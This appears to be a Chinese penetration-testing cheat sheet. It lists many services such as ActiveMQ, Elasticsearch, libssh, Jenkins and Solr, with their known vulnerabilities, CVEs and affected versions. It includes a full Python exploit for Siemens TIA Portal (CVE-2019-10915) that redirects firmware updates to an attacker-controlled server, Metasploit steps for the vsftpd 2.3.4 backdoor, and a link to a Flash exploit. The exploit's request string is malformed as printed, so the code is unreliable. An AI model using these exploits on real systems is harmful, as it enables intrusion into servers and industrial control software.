HFS(文件共享) HFS远程命令执行
phpmyadmin(mysql数据库管理工具) phpmyadmin弱密码
phpmoadmin(mongoDB管理工具 ) phpmoadmin远程代码执行
Elasticsearch(搜索服务器) elasticsearch远程命令执行 Elasticsearch未授权访问漏洞 Elasticsearch任意文件读取
"受影响的版本包括: OpenSSL 1.0.1 through 1.0.1g OpenSSL 1.0.0 through 1.0.0l all versions before OpenSSL 0.9.8y
openssl(ssl工具包) DROWN攻击漏洞”(CVE-2016-0800)
ccs注入漏洞
Kubernetes v1.0.x-1.9.x Kubernetes v1.10.0-1.10.10 (fixed in v1.10.11) Kubernetes v1.11.0-1.11.4 (fixed in v1.11.5) Kubernetes v1.12.0-1.12.2 (fixed in v1.12.3)" Kubernetes Kubernetes权限升级漏洞(CVE-2018-1002105)
axis2 axis2弱密码 axis2 axis2任意文件读取
"2.2.x 3.3.0-3.03" zabbix zabbix latest sql注入漏洞 zabbix zabbix jsrpc sql注入漏洞
activemq(中间件) activemq后台弱密码漏洞 activemq(中间件) activemq远程命令执行 activemq(中间件) activemq任意文件上传漏洞 activemq(中间件) ActiveMQ物理路径泄漏漏洞
Apache ActiveMQ 5.x ~ 5.14.0 activemq(中间件) ActiveMQ任意文件文件移动漏洞 Apache ActiveMQ 5.13.0的版本之前的存在反序列化漏洞 activemq(中间件)61616端口(ActiveMQ消息队列端口) ActiveMQ反序列化漏洞(CVE-2015-5254) Apache ActiveMQ5.14.0 – 5.15.2 activemq(中间件) ActiveMQ 信息泄漏漏洞(CVE-2017-15709)
Openssh(Open Secure Shell(openssh)是一个安全的登录系统,可以用来替代telnet、rlogin、rcp等) "ibssh 0.8.x - 0.8.3 libssh 0.7.x - 0.7.5 libssh 0.6.x" libssh(ssh工具包) cve-2018-10933 libssh认证绕过漏洞
grafana(rafana是一个跨平台的开源的度量分析和可视化工具,可以通过将采集的数据查询然后可视化的展示,并及时通知。)
grafana弱密码
hudson(Hudson是Jenkins的前身,它们都是基于Java开发的一种持续集成工具,) hudson代码泄露漏洞
apache mod_jk apache mod_jk访问控制绕过漏洞(cve-2018-11759)
node.js v8 debugger node.js v8 debugger 远程命令执行
Fckeditor
"https://www.jianshu.com/p/b0295978da77 /fckeditor/editor/dialog/fck_about.html /FCKeditor/_whatsnew.html"
Openssh
![](https://images.cnblogs.com/OutliningIndicators/ContractedBlock.gif)
![](https://images.cnblogs.com/OutliningIndicators/ExpandedBlockStart.gif)
1 CVE-2015-5600 2 CVE-2016-6515 3 CVE-2014-1692 4 CVE-2010-4478 5 CVE-2016-10009 6 CVE-2016-1908 7 CVE-2015-8325 8 CVE-2016-10012 9 CVE-2016-10010(提权)
Atlassian
![](https://images.cnblogs.com/OutliningIndicators/ContractedBlock.gif)
![](https://images.cnblogs.com/OutliningIndicators/ExpandedBlockStart.gif)
1 CVE-2019-1158
docker
![](https://images.cnblogs.com/OutliningIndicators/ContractedBlock.gif)
![](https://images.cnblogs.com/OutliningIndicators/ExpandedBlockStart.gif)
1 CVE-2018-15664
Siemens TIA Portal (STEP7) RCE : CVE-2019-10915
![](https://images.cnblogs.com/OutliningIndicators/ContractedBlock.gif)
![](https://images.cnblogs.com/OutliningIndicators/ExpandedBlockStart.gif)
1 ## 2 # Exploit Title: Siemens TIA Portal remote command execution 3 # Date: 06/11/2019 4 # Exploit Author: Joseph Bingham 5 # CVE : CVE-2019-10915 6 # Advisory: https://www.tenable.com/security/research/tra-2019-33 7 # Writeup: https://medium.com/tenable-techblog/nuclear-meltdown-with-critical-ics-vulnerabilities-8af3a1a13e6a 8 # Affected Vendors/Device/Firmware: 9 # - Siemens STEP7 / TIA Portal 10 ## 11 12 ## 13 # Example usage 14 # $ python cve_2019_10915_tia_portal_rce.py 15 # Received '0{"sid":"ZF_W8SDLY3SCGExV9QZc1Z9-","upgrades":[],"pingInterval":25000,"pingTimeout":60000}' 16 # Received '40' 17 # Received '42[" ",{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":0},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":""},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":""},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},null]' 18 ## 19 20 import websocket, ssl, argparse 21 22 parser = argparse.ArgumentParser() 23 parser.add_argument("target_host", help="TIA Portal host") 24 parser.add_argument("target_port", help="TIA Portal port (ie. 8888)", type=int) 25 parser.add_argument("update_server", help="Malicious firmware update server IP") 26 args = parser.parse_args() 27 28 host = args.target_host 29 port = args.target_port 30 updatesrv = args.update_server 31 ws = websocket.create_connection("wss://"+host+":"+port+"/socket.io/?EIO=3&transport=websocket&sid=", sslopt={"cert_reqs": ssl.CERT_NONE}) 32 #req = '42["cli2serv",{"moduleFunc":"ProxyModule.readProxySettings","data":"","responseEvent":" "}]' 33 #req = '42["cli2serv",{"moduleFunc":"ProxyModule.saveProxyConfiguration","data":{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":1},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":"10.0.0.200"},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":"8888"},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},responseEvent":" "}]' 34 req = 42["cli2serv",{"moduleFunc":"SoftwareModule.saveUrlSettings","data":{"ServerUrl":"https://"+updatesrv+"/FWUpdate/","ServerSource":"CORPORATESERVER","SelectedUSBDrive":"\\","USBDrivePath":"","downloadDestinationPath":"C:\\Siemens\\TIA Admin\\DownloadCache","isMoveDownloadNewDestination":true,"CyclicCheck":false,"sourcePath":"C:\\Siemens\\TIA Admin\\DownloadCache","productionLine":"ProductionLine1","isServerChanged":true},"responseEvent":" "}]' 35 ws.send(req) 36 37 result = ws.recv() 38 print("Received '%s'" % result) 39 40 result = ws.recv() 41 print("Received '%s'" % result) 42 43 result = ws.recv() 44 print("Received '%s'" % result)
WinRAR
CVE-2018-2025(WinRAR RCE)
![](https://images.cnblogs.com/OutliningIndicators/ContractedBlock.gif)
![](https://images.cnblogs.com/OutliningIndicators/ExpandedBlockStart.gif)
1 影响范围: 2 3 WinRAR < 5.70 Beta 1 4 5 Bandizip < = 6.2.0.0 6 7 好压(2345压缩) < = 5.9.8.10907 8 9 360压缩 < = 4.0.0.1170
ghostscript
![](https://images.cnblogs.com/OutliningIndicators/ContractedBlock.gif)
![](https://images.cnblogs.com/OutliningIndicators/ExpandedBlockStart.gif)
1 影响的版本 <= 9.23(全版本、全平台)
CVE-2017-8291
![](https://images.cnblogs.com/OutliningIndicators/ContractedBlock.gif)
![](https://images.cnblogs.com/OutliningIndicators/ExpandedBlockStart.gif)
1 Ghostscript Ghostscript < 2017-04-26
Flash
CVE-2018-4878
![](https://images.cnblogs.com/OutliningIndicators/ContractedBlock.gif)
![](https://images.cnblogs.com/OutliningIndicators/ExpandedBlockStart.gif)
1 项目地址:https://github.com/Sch01ar/CVE-2018-4878.git 2 3 影响版本为:Adobe Flash Player <= 28.0.0.137
Office
CVE-2017-11882(RCE)
![](https://images.cnblogs.com/OutliningIndicators/ContractedBlock.gif)
![](https://images.cnblogs.com/OutliningIndicators/ExpandedBlockStart.gif)
1 漏洞影响版本: 2 Office 365 3 Microsoft Office 2000 4 Microsoft Office 2003 5 Microsoft Office 2007 Service Pack 3 6 Microsoft Office 2010 Service Pack 2 7 Microsoft Office 2013 Service Pack 1 8 Microsoft Office 2016
vsftpd
![](https://images.cnblogs.com/OutliningIndicators/ContractedBlock.gif)
![](https://images.cnblogs.com/OutliningIndicators/ExpandedBlockStart.gif)
1 vsftpd 2.3.4 - 笑脸漏洞 2 msfconsole 3 search vsftpd 4 use exploit/unix/ftp/vsftpd_234_backdoor 5 set rhost IP 6 run
memcache
常用端口 11211 未授权访问
memcache memcache drdos漏洞( B6-2018-030102) 1.4.31 memcache Memcached Append/prepend 远程代码执行漏洞(CVE-2016-8704) 1.4.31 memcache Memcache Update 远程代码执行漏洞(CVE-2016-8705) 1.4.31 memcache Memcache SASL身份验证远程代码执行漏洞(CVE-2016-8706)
jenkins
常用端口 8080 未授权访问 反序列化 cve-2017-1000353 CVE-2018-1999002
GeoServer
1.弱口令
Javascript is required to actually use the GeoServer admin console. - 网站没有添加到可信任站点
2.XXE(版本小于2.7.1.1)
ccproxy
ccproxy6.0远程溢出
solr
未授权访问 CVE-2017-12629 XXE & RCE CVE-2019-0193 RCE
FasterXML
Jackson-databind CVE-2019-12384(RCE) 受影响版本 Jackson-databind 2.X < 2.9.9.1 不受影响版本 Jackson-databind 2.9.9.1 Jackson-databind 2.10